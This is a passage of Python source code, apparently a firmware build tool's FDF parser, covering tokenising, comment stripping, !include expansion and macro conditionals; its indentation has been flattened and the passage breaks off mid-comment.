# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import re
import os
import CommonDataClass.FdfClass
##define T_CHAR_SPACE ' '
##define T_CHAR_NULL '\0'
##define T_CHAR_CR '\r'
##define T_CHAR_TAB '\t'
##define T_CHAR_LF '\n'
##define T_CHAR_SLASH '/'
##define T_CHAR_BACKSLASH '\\'
##define T_CHAR_DOUBLE_QUOTE '\"'
##define T_CHAR_SINGLE_QUOTE '\''
##define T_CHAR_STAR '*'
##define T_CHAR_HASH '#'
(T_CHAR_SPACE, T_CHAR_NULL, T_CHAR_CR, T_CHAR_TAB, T_CHAR_LF, T_CHAR_SLASH, \
T_CHAR_BACKSLASH, T_CHAR_DOUBLE_QUOTE, T_CHAR_SINGLE_QUOTE, T_CHAR_STAR, T_CHAR_HASH) = \
(' ', '\0', '\r', '\t', '\n', '/', '\\', '\"', '\'', '*', '#')
SEPERATOR_TUPLE = ('=', '|', ',', '{', '}')
IncludeFileList = []
# Macro passed from command line, which has greatest priority and can NOT be overridden by those in FDF
InputMacroDict = {}
# All Macro values when parsing file, not replace existing Macro
AllMacroList = []
def GetRealFileLine (File, Line):
InsertedLines = 0
for Profile in IncludeFileList:
if Line >= Profile.InsertStartLineNumber and Line < Profile.InsertStartLineNumber + Profile.InsertAdjust + len(Profile.FileLinesList):
return (Profile.FileName, Line - Profile.InsertStartLineNumber + 1)
if Line >= Profile.InsertStartLineNumber + Profile.InsertAdjust + len(Profile.FileLinesList):
InsertedLines += Profile.InsertAdjust + len(Profile.FileLinesList)
return (File, Line - InsertedLines)
## The exception class that used to report error messages when parsing FDF
#
# Currently the "ToolName" is set to be "FDF Parser".
#
class Warning (Exception):
## The constructor
#
# @param self The object pointer
# @param Str The message to record
# @param File The FDF name
# @param Line The Line number that error occurs
#
def __init__(self, Str, File = None, Line = None):
FileLineTuple = GetRealFileLine(File, Line)
self.FileName = FileLineTuple[0]
self.LineNumber = FileLineTuple[1]
self.message = Str + str(self.LineNumber)
self.ToolName = 'FDF Parser'
## The MACRO class that used to record macro value data when parsing include file
#
#
class MacroProfile :
## The constructor
#
# @param self The object pointer
# @param FileName The file that to be parsed
#
def __init__(self, FileName, Line):
self.FileName = FileName
self.DefinedAtLine = Line
self.MacroName = None
self.MacroValue = None
## The Include file content class that used to record file data when parsing include file
#
# May raise Exception when opening file.
#
class IncludeFileProfile :
## The constructor
#
# @param self The object pointer
# @param FileName The file that to be parsed
#
def __init__(self, FileName):
self.FileName = FileName
self.FileLinesList = []
try:
fsock = open(FileName, "rb", 0)
try:
self.FileLinesList = fsock.readlines()
finally:
fsock.close()
except IOError:
raise Warning("Error when opening file %s" % FileName)
self.InsertStartLineNumber = None
self.InsertAdjust = 0
## The FDF content class that used to record file data when parsing FDF
#
# May raise Exception when opening file.
#
class FileProfile :
## The constructor
#
# @param self The object pointer
# @param FileName The file that to be parsed
#
def __init__(self, FileName):
self.FileLinesList = []
try:
fsock = open(FileName, "rb", 0)
try:
self.FileLinesList = fsock.readlines()
finally:
fsock.close()
except IOError:
raise Warning("Error when opening file %s" % FileName)
self.PcdDict = {}
self.InfList = []
self.PcdFileLineDict = {}
self.InfFileLineList = []
self.FdDict = {}
self.FvDict = {}
self.CapsuleList = []
# self.VtfList = []
# self.RuleDict = {}
## The syntax parser for FDF
#
# PreprocessFile method should be called prior to ParseFile
# CycleReferenceCheck method can detect cycles in FDF contents
#
# GetNext*** procedures mean these procedures will get next token first, then make judgement.
# Get*** procedures mean these procedures will make judgement on current token only.
#
class FdfParser(object):
## The constructor
#
# @param self The object pointer
# @param FileName The file that to be parsed
#
def __init__(self, FileName):
self.Profile = FileProfile(FileName)
self.FileName = FileName
self.CurrentLineNumber = 1
self.CurrentOffsetWithinLine = 0
self.CurrentFdName = None
self.CurrentFvName = None
self.__Token = ""
self.__SkippedChars = ""
self.__WipeOffArea = []
## __IsWhiteSpace() method
#
# Whether char at current FileBufferPos is whitespace
#
# @param self The object pointer
# @param Char The char to test
# @retval True The char is a kind of white space
# @retval False The char is NOT a kind of white space
#
def __IsWhiteSpace(self, Char):
if Char in (T_CHAR_NULL, T_CHAR_CR, T_CHAR_SPACE, T_CHAR_TAB, T_CHAR_LF):
return True
else:
return False
## __SkipWhiteSpace() method
#
# Skip white spaces from current char, return number of chars skipped
#
# @param self The object pointer
# @retval Count The number of chars skipped
#
def __SkipWhiteSpace(self):
Count = 0
while not self.__EndOfFile():
Count += 1
if self.__CurrentChar() in (T_CHAR_NULL, T_CHAR_CR, T_CHAR_LF, T_CHAR_SPACE, T_CHAR_TAB):
self.__SkippedChars += str(self.__CurrentChar())
self.__GetOneChar()
else:
Count = Count - 1
return Count
## __EndOfFile() method
#
# Judge current buffer pos is at file end
#
# @param self The object pointer
# @retval True Current File buffer position is at file end
# @retval False Current File buffer position is NOT at file end
#
def __EndOfFile(self):
NumberOfLines = len(self.Profile.FileLinesList)
SizeOfLastLine = len(self.Profile.FileLinesList[-1])
if self.CurrentLineNumber == NumberOfLines and self.CurrentOffsetWithinLine >= SizeOfLastLine - 1:
return True
elif self.CurrentLineNumber > NumberOfLines:
return True
else:
return False
## __EndOfLine() method
#
# Judge current buffer pos is at line end
#
# @param self The object pointer
# @retval True Current File buffer position is at line end
# @retval False Current File buffer position is NOT at line end
#
def __EndOfLine(self):
if self.CurrentLineNumber > len(self.Profile.FileLinesList):
return True
SizeOfCurrentLine = len(self.Profile.FileLinesList[self.CurrentLineNumber - 1])
if self.CurrentOffsetWithinLine >= SizeOfCurrentLine:
return True
else:
return False
## Rewind() method
#
# Reset file data buffer to the initial state
#
# @param self The object pointer
#
def Rewind(self):
self.CurrentLineNumber = 1
self.CurrentOffsetWithinLine = 0
## __UndoOneChar() method
#
# Go back one char in the file buffer
#
# @param self The object pointer
# @retval True Successfully go back one char
# @retval False Not able to go back one char as file beginning reached
#
def __UndoOneChar(self):
if self.CurrentLineNumber == 1 and self.CurrentOffsetWithinLine == 0:
return False
elif self.CurrentOffsetWithinLine == 0:
self.CurrentLineNumber -= 1
self.CurrentOffsetWithinLine = len(self.__CurrentLine()) - 1
else:
self.CurrentOffsetWithinLine -= 1
return True
## __GetOneChar() method
#
# Move forward one char in the file buffer
#
# @param self The object pointer
#
def __GetOneChar(self):
if self.CurrentOffsetWithinLine == len(self.Profile.FileLinesList[self.CurrentLineNumber - 1]) - 1:
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
else:
self.CurrentOffsetWithinLine += 1
## __CurrentChar() method
#
# Get the char pointed to by the file buffer pointer
#
# @param self The object pointer
# @retval Char Current char
#
def __CurrentChar(self):
return self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine]
## __NextChar() method
#
# Get the one char pass the char pointed to by the file buffer pointer
#
# @param self The object pointer
# @retval Char Next char
#
def __NextChar(self):
if self.CurrentOffsetWithinLine == len(self.Profile.FileLinesList[self.CurrentLineNumber - 1]) - 1:
return self.Profile.FileLinesList[self.CurrentLineNumber][0]
else:
return self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine + 1]
## __SetCurrentCharValue() method
#
# Modify the value of current char
#
# @param self The object pointer
# @param Value The new value of current char
#
def __SetCurrentCharValue(self, Value):
self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine] = Value
## __CurrentLine() method
#
# Get the list that contains current line contents
#
# @param self The object pointer
# @retval List current line contents
#
def __CurrentLine(self):
return self.Profile.FileLinesList[self.CurrentLineNumber - 1]
def __StringToList(self):
self.Profile.FileLinesList = [list(s) for s in self.Profile.FileLinesList]
self.Profile.FileLinesList[-1].append(' ')
def __ReplaceMacros(self, Str, File, Line):
MacroEnd = 0
while Str.find('$(', MacroEnd) >= 0:
MacroStart = Str.find('$(', MacroEnd)
if Str.find(')', MacroStart) > 0:
MacroEnd = Str.find(')', MacroStart)
Name = Str[MacroStart + 2 : MacroEnd]
Value = None
if Name in InputMacroDict:
Value = InputMacroDict[Name]
else:
for Profile in AllMacroList:
if Profile.FileName == File and Profile.MacroName == Name and Profile.DefinedAtLine <= Line:
Value = Profile.MacroValue
if Value != None:
Str = Str.replace('$(' + Name + ')', Value)
MacroEnd = MacroStart + len(Value)
else:
raise Warning("Macro not complete At Line ", self.FileName, self.CurrentLineNumber)
return Str
def __ReplaceFragment(self, StartPos, EndPos, Value = ' '):
if StartPos[0] == EndPos[0]:
Offset = StartPos[1]
while Offset <= EndPos[1]:
self.Profile.FileLinesList[StartPos[0]][Offset] = Value
Offset += 1
return
Offset = StartPos[1]
while self.Profile.FileLinesList[StartPos[0]][Offset] not in ('\r', '\n'):
self.Profile.FileLinesList[StartPos[0]][Offset] = Value
Offset += 1
Line = StartPos[0]
while Line < EndPos[0]:
Offset = 0
while self.Profile.FileLinesList[Line][Offset] not in ('\r', '\n'):
self.Profile.FileLinesList[Line][Offset] = Value
Offset += 1
Line += 1
Offset = 0
while Offset <= EndPos[1]:
self.Profile.FileLinesList[EndPos[0]][Offset] = Value
Offset += 1
def __GetMacroName(self):
if not self.__GetNextToken():
raise Warning("expected Macro name", self.FileName, self.CurrentLineNumber)
MacroName = self.__Token
NotFlag = False
if MacroName.startswith('!'):
NotFlag = True
MacroName = MacroName[1:].strip()
if not MacroName.startswith('$(') or not MacroName.endswith(')'):
raise Warning("Macro name expected(Please use '$(%(Token)s)' if '%(Token)s' is a macro.)" % {"Token" : MacroName},
self.FileName, self.CurrentLineNumber)
MacroName = MacroName[2:-1]
return MacroName, NotFlag
## PreprocessFile() method
#
# Preprocess file contents, replace comments with spaces.
# In the end, rewind the file buffer pointer to the beginning
# BUGBUG: No !include statement processing contained in this procedure
# !include statement should be expanded at the same FileLinesList[CurrentLineNumber - 1]
#
# @param self The object pointer
#
def PreprocessFile(self):
self.Rewind()
InComment = False
DoubleSlashComment = False
HashComment = False
# HashComment in quoted string " " is ignored.
InString = False
while not self.__EndOfFile():
if self.__CurrentChar() == T_CHAR_DOUBLE_QUOTE and not InComment:
InString = not InString
# meet new line, then no longer in a comment for // and '#'
if self.__CurrentChar() == T_CHAR_LF:
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
if InComment and DoubleSlashComment:
InComment = False
DoubleSlashComment = False
if InComment and HashComment:
InComment = False
HashComment = False
# check for */ comment end
elif InComment and not DoubleSlashComment and not HashComment and self.__CurrentChar() == T_CHAR_STAR and self.__NextChar() == T_CHAR_SLASH:
self.__SetCurrentCharValue(T_CHAR_SPACE)
self.__GetOneChar()
self.__SetCurrentCharValue(T_CHAR_SPACE)
self.__GetOneChar()
InComment = False
# set comments to spaces
elif InComment:
self.__SetCurrentCharValue(T_CHAR_SPACE)
self.__GetOneChar()
# check for // comment
elif self.__CurrentChar() == T_CHAR_SLASH and self.__NextChar() == T_CHAR_SLASH and not self.__EndOfLine():
InComment = True
DoubleSlashComment = True
# check for '#' comment
elif self.__CurrentChar() == T_CHAR_HASH and not self.__EndOfLine() and not InString:
InComment = True
HashComment = True
# check for /* comment start
elif self.__CurrentChar() == T_CHAR_SLASH and self.__NextChar() == T_CHAR_STAR:
self.__SetCurrentCharValue( T_CHAR_SPACE)
self.__GetOneChar()
self.__SetCurrentCharValue( T_CHAR_SPACE)
self.__GetOneChar()
InComment = True
else:
self.__GetOneChar()
# restore from ListOfList to ListOfString
self.Profile.FileLinesList = ["".join(list) for list in self.Profile.FileLinesList]
self.Rewind()
## PreprocessIncludeFile() method
#
# Preprocess file contents, replace !include statements with file contents.
# In the end, rewind the file buffer pointer to the beginning
#
# @param self The object pointer
#
def PreprocessIncludeFile(self):
while self.__GetNextToken():
if self.__Token == '!include':
IncludeLine = self.CurrentLineNumber
IncludeOffset = self.CurrentOffsetWithinLine - len('!include')
if not self.__GetNextToken():
raise Warning("expected include file name At Line ", self.FileName, self.CurrentLineNumber)
IncFileName = self.__Token
if not os.path.isabs(IncFileName):
if IncFileName.startswith('$(WORKSPACE)'):
Str = IncFileName.replace('$(WORKSPACE)', os.environ.get('WORKSPACE'))
if os.path.exists(Str):
if not os.path.isabs(Str):
Str = os.path.abspath(Str)
IncFileName = Str
else:
# file is in the same dir with FDF file
FullFdf = self.FileName
if not os.path.isabs(self.FileName):
FullFdf = os.path.join(os.environ.get('WORKSPACE'), self.FileName)
IncFileName = os.path.join(os.path.dirname(FullFdf), IncFileName)
if not os.path.exists(os.path.normpath(IncFileName)):
raise Warning("Include file not exists At Line ", self.FileName, self.CurrentLineNumber)
IncFileProfile = IncludeFileProfile(os.path.normpath(IncFileName))
CurrentLine = self.CurrentLineNumber
CurrentOffset = self.CurrentOffsetWithinLine
# list index of the insertion, note that line number is 'CurrentLine + 1'
InsertAtLine = CurrentLine
IncFileProfile.InsertStartLineNumber = InsertAtLine + 1
# deal with remaining portions after "!include filename", if exists.
if self.__GetNextToken():
if self.CurrentLineNumber == CurrentLine:
RemainingLine = self.__CurrentLine()[CurrentOffset:]
self.Profile.FileLinesList.insert(self.CurrentLineNumber, RemainingLine)
IncFileProfile.InsertAdjust += 1
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
for Line in IncFileProfile.FileLinesList:
self.Profile.FileLinesList.insert(InsertAtLine, Line)
self.CurrentLineNumber += 1
InsertAtLine += 1
IncludeFileList.append(IncFileProfile)
# comment out the processed include file statement
TempList = list(self.Profile.FileLinesList[IncludeLine - 1])
TempList.insert(IncludeOffset, '#')
self.Profile.FileLinesList[IncludeLine - 1] = ''.join(TempList)
self.Rewind()
## PreprocessIncludeFile() method
#
# Preprocess file contents, replace !include statements with file contents.
# In the end, rewind the file buffer pointer to the beginning
#
# @param self The object pointer
#
def PreprocessConditionalStatement(self):
# IfList is a stack of if branches with elements of list [Pos, CondSatisfied, BranchDetermined]
IfList = []
while self.__GetNextToken():
if self.__Token == 'DEFINE':
DefineLine = self.CurrentLineNumber - 1
DefineOffset = self.CurrentOffsetWithinLine - len('DEFINE')
if not self.__GetNextToken():
raise Warning("expected Macro name At Line ", self.FileName, self.CurrentLineNumber)
Macro = self.__Token
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
pass
Value = self.__Token
if not Macro in InputMacroDict:
FileLineTuple = GetRealFileLine(self.FileName, DefineLine + 1)
MacProfile = MacroProfile(FileLineTuple[0], FileLineTuple[1])
MacProfile.MacroName = Macro
MacProfile.MacroValue = Value
AllMacroList.append(MacProfile)
self.__WipeOffArea.append(((DefineLine, DefineOffset), (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
elif self.__Token in ('!ifdef', '!ifndef', '!if'):
IfStartPos = (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - len(self.__Token))
IfList.append([IfStartPos, None, None])
CondLabel = self.__Token
MacroName, NotFlag = self.__GetMacroName()
NotDefineFlag = False
if CondLabel == '!ifndef':
NotDefineFlag = True
if CondLabel == '!ifdef' or CondLabel == '!ifndef':
if NotFlag:
raise Warning("'NOT' operation not allowed for Macro name At Line ", self.FileName, self.CurrentLineNumber)
if CondLabel == '!if':
if not self.__GetNextOp():
raise Warning("expected !endif At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token in ('!=', '==', '>', '<', '>=', '<='):
Op = self.__Token
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
pass
MacroValue = self.__Token
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1, Op, MacroValue)
if NotFlag:
ConditionSatisfied = not ConditionSatisfied
BranchDetermined = ConditionSatisfied
else:
self.CurrentOffsetWithinLine -= len(self.__Token)
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1, None, 'Bool')
if NotFlag:
ConditionSatisfied = not ConditionSatisfied
BranchDetermined = ConditionSatisfied
IfList[-1] = [IfList[-1][0], ConditionSatisfied, BranchDetermined]
if ConditionSatisfied:
self.__WipeOffArea.append((IfList[-1][0], (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
else:
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1)
if NotDefineFlag:
ConditionSatisfied = not ConditionSatisfied
BranchDetermined = ConditionSatisfied
IfList[-1] = [IfList[-1][0], ConditionSatisfied, BranchDetermined]
if ConditionSatisfied:
self.__WipeOffArea.append((IfStartPos, (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
elif self.__Token in ('!elseif', '!else'):
ElseStartPos = (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - len(self.__Token))
if len(IfList) <= 0:
raise Warning("Missing !if statement At Line ", self.FileName, self.CurrentLineNumber)
if IfList[-1][1]:
IfList[-1] = [ElseStartPos, False, True]
self.__WipeOffArea.append((ElseStartPos, (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
else:
self.__WipeOffArea.append((IfList[-1][0], ElseStartPos))
IfList[-1] = [ElseStartPos, True, IfList[-1][2]]
if self.__Token == '!elseif':
MacroName, NotFlag = self.__GetMacroName()
if not self.__GetNextOp():
raise Warning("expected !endif At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token in ('!=', '==', '>', '<', '>=', '<='):
Op = self.__Token
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
pass
MacroValue = self.__Token
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1, Op, MacroValue)
if NotFlag:
ConditionSatisfied = not ConditionSatisfied
else:
self.CurrentOffsetWithinLine -= len(self.__Token)
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1, None, 'Bool')
if NotFlag:
ConditionSatisfied = not ConditionSatisfied
IfList[-1] = [IfList[-1][0], ConditionSatisfied, IfList[-1][2]]
if IfList[-1][1]:
if IfList[-1][2]:
IfList[-1][1] = False
else:
IfList[-1][2] = True
self.__WipeOffArea.append((IfList[-1][0], (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
elif self.__Token == '!endif':
if IfList[-1][1]:
self.__WipeOffArea.append(((self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - len('!endif')), (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
else:
self.__WipeOffArea.append((IfList[-1][0], (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
IfList.pop()
if len(IfList) > 0:
raise Warning("Missing !endif At Line ", self.FileName, self.CurrentLineNumber)
self.Rewind()
def __EvaluateConditional(self, Name, Line, Op = None, Value = None):
FileLineTuple = GetRealFileLine(self.FileName, Line)
if Name in InputMacroDict:
MacroValue = InputMacroDict[Name]
if Op == None:
if Value == 'Bool' and MacroValue == None or MacroValue.upper() == 'FALSE':
return False
return True
elif Op == '!=':
if Value != MacroValue:
return True
else:
return False
elif Op == '==':
if Value == MacroValue:
return True
else:
return False
else:
if (self.__IsHex(Value) or Value.isdigit()) and (self.__IsHex(MacroValue) or (MacroValue != None and MacroValue.isdigit())):
InputVal = long(Value, 0)
MacroVal = long(MacroValue, 0)
if Op == '>':
if MacroVal > InputVal:
return True
else:
return False
elif Op == '>=':
if MacroVal >= InputVal:
return True
else:
return False
elif Op == '<':
if MacroVal < InputVal:
return True
else:
return False
elif Op == '<=':
if MacroVal <= InputVal:
return True
else:
return False
else:
return False
else:
raise Warning("Value %s is not a number At Line ", self.FileName, Line)
for Profile in AllMacroList:
if Profile.FileName == FileLineTuple[0] and Profile.MacroName == Name and Profile.DefinedAtLine <= FileLineTuple[1]:
if Op == None:
if Value == 'Bool' and Profile.MacroValue == None or Profile.MacroValue.upper() == 'FALSE':
return False
return True
elif Op == '!=':
if Value != Profile.MacroValue:
return True
else:
return False
elif Op == '==':
if Value == Profile.MacroValue:
return True
else:
return False
else:
if (self.__IsHex(Value) or Value.isdigit()) and (self.__IsHex(Profile.MacroValue) or (Profile.MacroValue != None and Profile.MacroValue.isdigit())):
InputVal = long(Value, 0)
MacroVal = long(Profile.MacroValue, 0)
if Op == '>':
if MacroVal > InputVal:
return True
else:
return False
elif Op == '>=':
if MacroVal >= InputVal:
return True
else:
return False
elif Op == '<':
if MacroVal < InputVal:
return True
else:
return False
elif Op == '<=':
if MacroVal <= InputVal:
return True
else:
return False
else:
return False
else:
raise Warning("Value %s is not a number At Line ", self.FileName, Line)
return False
## __IsToken() method
#
# Check whether input string is found from current char position along
# If found, the string value is put into self.__Token
#
# @param self The object pointer
# @param String The string to search
# @param IgnoreCase Indicate case sensitive/non-sensitive search, default is case sensitive
# @retval True Successfully find string, file buffer pointer moved forward
# @retval False Not able to find string, file buffer pointer not changed
#
def __IsToken(self, String, IgnoreCase = False):
self.__SkipWhiteSpace()
# Only consider the same line, no multi-line token allowed
StartPos = self.CurrentOffsetWithinLine
index = -1
if IgnoreCase:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].upper().find(String.upper())
else:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].find(String)
if index == 0:
self.CurrentOffsetWithinLine += len(String)
self.__Token = self.__CurrentLine()[StartPos : self.CurrentOffsetWithinLine]
return True
return False
## __IsKeyword() method
#
# Check whether input keyword is found from current char position along, whole word only!
# If found, the string value is put into self.__Token
#
# @param self The object pointer
# @param Keyword The string to search
# @param IgnoreCase Indicate case sensitive/non-sensitive search, default is case sensitive
# @retval True Successfully find string, file buffer pointer moved forward
# @retval False Not able to find string, file buffer pointer not changed
#
def __IsKeyword(self, KeyWord, IgnoreCase = False):
self.__SkipWhiteSpace()
# Only consider the same line, no multi-line token allowed
StartPos = self.CurrentOffsetWithinLine
index = -1
if IgnoreCase:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].upper().find(KeyWord.upper())
else:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].find(KeyWord)
if index == 0:
followingChar = self.__CurrentLine()[self.CurrentOffsetWithinLine + len(KeyWord)]
if not str(followingChar).isspace() and followingChar not in SEPERATOR_TUPLE:
return False
self.CurrentOffsetWithinLine += len(KeyWord)
self.__Token = self.__CurrentLine()[StartPos : self.CurrentOffsetWithinLine]
return True
return False
## __GetNextWord() method
#
# Get next C name from file lines
# If found, the string value is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a C name string, file buffer pointer moved forward
# @retval False Not able to find a C name string, file buffer pointer not changed
#
def __GetNextWord(self):
self.__SkipWhiteSpace()
if self.__EndOfFile():
return False
TempChar = self.__CurrentChar()
StartPos = self.CurrentOffsetWithinLine
if (TempChar >= 'a' and TempChar <= 'z') or (TempChar >= 'A' and TempChar <= 'Z') or TempChar == '_':
self.__GetOneChar()
while not self.__EndOfLine():
TempChar = self.__CurrentChar()
if (TempChar >= 'a' and TempChar <= 'z') or (TempChar >= 'A' and TempChar <= 'Z') \
or (TempChar >= '0' and TempChar <= '9') or TempChar == '_' or TempChar == '-':
self.__GetOneChar()
else:
break
self.__Token = self.__CurrentLine()[StartPos : self.CurrentOffsetWithinLine]
return True
return False
## __GetNextToken() method
#
# Get next token unit before a seperator
# If found, the string value is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a token unit, file buffer pointer moved forward
# @retval False Not able to find a token unit, file buffer pointer not changed
#
def __GetNextToken(self):
# Skip leading spaces, if exist.
self.__SkipWhiteSpace()
if self.__EndOfFile():
return False
# Record the token start position, the position of the first non-space char.
StartPos = self.CurrentOffsetWithinLine
StartLine = self.CurrentLineNumber
while not self.__EndOfLine():
TempChar = self.__CurrentChar()
# Try to find the end char that is not a space and not in seperator tuple.
# That is, when we got a space or any char in the tuple, we got the end of token.
if not str(TempChar).isspace() and TempChar not in SEPERATOR_TUPLE:
self.__GetOneChar()
# if we happen to meet a seperator as the first char, we must proceed to get it.
# That is, we get a token that is a seperator char. nomally it is the boundary of other tokens.
elif StartPos == self.CurrentOffsetWithinLine and TempChar in SEPERATOR_TUPLE:
self.__GetOneChar()
break
else:
break
# else:
# return False
EndPos = self.CurrentOffsetWithinLine
if self.CurrentLineNumber != StartLine:
EndPos = len(self.Profile.FileLinesList[StartLine-1])
self.__Token = self.Profile.FileLinesList[StartLine-1][StartPos : EndPos]
if StartPos != self.CurrentOffsetWithinLine:
return True
else:
return False
def __GetNextOp(self):
# Skip leading spaces, if exist.
self.__SkipWhiteSpace()
if self.__EndOfFile():
return False
# Record the token start position, the position of the first non-space char.
StartPos = self.CurrentOffsetWithinLine
while not self.__EndOfLine():
TempChar = self.__CurrentChar()
# Try to find the end char that is not a space
if not str(TempChar).isspace():
self.__GetOneChar()
else:
break
else:
return False
if StartPos != self.CurrentOffsetWithinLine:
self.__Token = self.__CurrentLine()[StartPos : self.CurrentOffsetWithinLine]
return True
else:
return False
## __GetNextGuid() method
#
# Get next token unit before a seperator
# If found, the GUID string is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a registry format GUID, file buffer pointer moved forward
# @retval False Not able to find a registry format GUID, file buffer pointer not changed
#
def __GetNextGuid(self):
if not self.__GetNextToken():
return False
p = re.compile('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')
if p.match(self.__Token) != None:
return True
else:
self.__UndoToken()
return False
## __UndoToken() method
#
# Go back one token unit in file buffer
#
# @param self The object pointer
#
def __UndoToken(self):
self.__UndoOneChar()
while self.__CurrentChar().isspace():
if not self.__UndoOneChar():
self.__GetOneChar()
return
StartPos = self.CurrentOffsetWithinLine
CurrentLine = self.CurrentLineNumber
while CurrentLine == self.CurrentLineNumber:
TempChar = self.__CurrentChar()
# Try to find the end char that is not a space and not in seperator tuple.
# That is, when we got a space or any char in the tuple, we got the end of token.
if not str(TempChar).isspace() and not TempChar in SEPERATOR_TUPLE:
if not self.__UndoOneChar():
break
# if we happen to meet a seperator as the first char, we must proceed to get it.
# That is, we get a token that is a seperator char. nomally it is the boundary of other tokens.
elif StartPos == self.CurrentOffsetWithinLine and TempChar in SEPERATOR_TUPLE:
return
else:
break
self.__GetOneChar()
## __HexDigit() method
#
# Whether char input is a Hex data bit
#
# @param self The object pointer
# @param TempChar The char to test
# @retval True The char is a Hex data bit
# @retval False The char is NOT a Hex data bit
#
def __HexDigit(self, TempChar):
if (TempChar >= 'a' and TempChar <= 'f') or (TempChar >= 'A' and TempChar <= 'F') \
or (TempChar >= '0' and TempChar <= '9'):
return True
else:
return False
def __IsHex(self, HexStr):
if not HexStr.upper().startswith("0X"):
return False
if len(self.__Token) <= 2:
return False
charList = [c for c in HexStr[2 : ] if not self.__HexDigit( c)]
if len(charList) == 0:
return True
else:
return False
## __GetNextHexNumber() method
#
# Get next HEX data before a seperator
# If found, the HEX data is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a HEX data, file buffer pointer moved forward
# @retval False Not able to find a HEX data, file buffer pointer not changed
#
def __GetNextHexNumber(self):
if not self.__GetNextToken():
return False
if self.__IsHex(self.__Token):
return True
else:
self.__UndoToken()
return False
## __GetNextDecimalNumber() method
#
# Get next decimal data before a seperator
# If found, the decimal data is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a decimal data, file buffer pointer moved forward
# @retval False Not able to find a decimal data, file buffer pointer not changed
#
def __GetNextDecimalNumber(self):
if not self.__GetNextToken():
return False
if self.__Token.isdigit():
return True
else:
self.__UndoToken()
return False
## __GetNextPcdName() method
#
# Get next PCD token space C name and PCD C name pair before a seperator
# If found, the decimal data is put into self.__Token
#
# @param self The object pointer
# @retval Tuple PCD C name and PCD token space C name pair
#
def __GetNextPcdName(self):
if not self.__GetNextWord():
raise Warning("expected PcdTokenSpaceCName.PcdCName At Line ", self.FileName, self.CurrentLineNumber)
pcdTokenSpaceCName = self.__Token
if not self.__IsToken( "."):
raise Warning("expected PcdTokenSpaceCName.PcdCName At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected PcdTokenSpaceCName.PcdCName At Line ", self.FileName, self.CurrentLineNumber)
pcdCName = self.__Token
return (pcdCName, pcdTokenSpaceCName)
## __GetStringData() method
#
# Get string contents quoted in ""
# If found, the decimal data is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a string data, file buffer pointer moved forward
# @retval False Not able to find a string data, file buffer pointer not changed
#
def __GetStringData(self):
if self.__Token.startswith("\"") or self.__Token.startswith("L\""):
self.__UndoToken()
self.__SkipToToken("\"")
currentLineNumber = self.CurrentLineNumber
if not self.__SkipToToken("\""):
raise Warning("Missing Quote \" for String At Line ", self.FileName, self.CurrentLineNumber)
if currentLineNumber != self.CurrentLineNumber:
raise Warning("Missing Quote \" for String At Line ", self.FileName, self.CurrentLineNumber)
self.__Token = self.__SkippedChars.rstrip('\"')
return True
elif self.__Token.startswith("\'") or self.__Token.startswith("L\'"):
self.__UndoToken()
self.__SkipToToken("\'")
currentLineNumber = self.CurrentLineNumber
if not self.__SkipToToken("\'"):
raise Warning("Missing Quote \' for String At Line ", self.FileName, self.CurrentLineNumber)
if currentLineNumber != self.CurrentLineNumber:
raise Warning("Missing Quote \' for String At Line ", self.FileName, self.CurrentLineNumber)
self.__Token = self.__SkippedChars.rstrip('\'')
return True
else:
return False
## __SkipToToken() method
#
# Search forward in file buffer for the string
# The skipped chars are put into self.__SkippedChars
#
# @param self The object pointer
# @param String The string to search
# @param IgnoreCase Indicate case sensitive/non-sensitive search, default is case sensitive
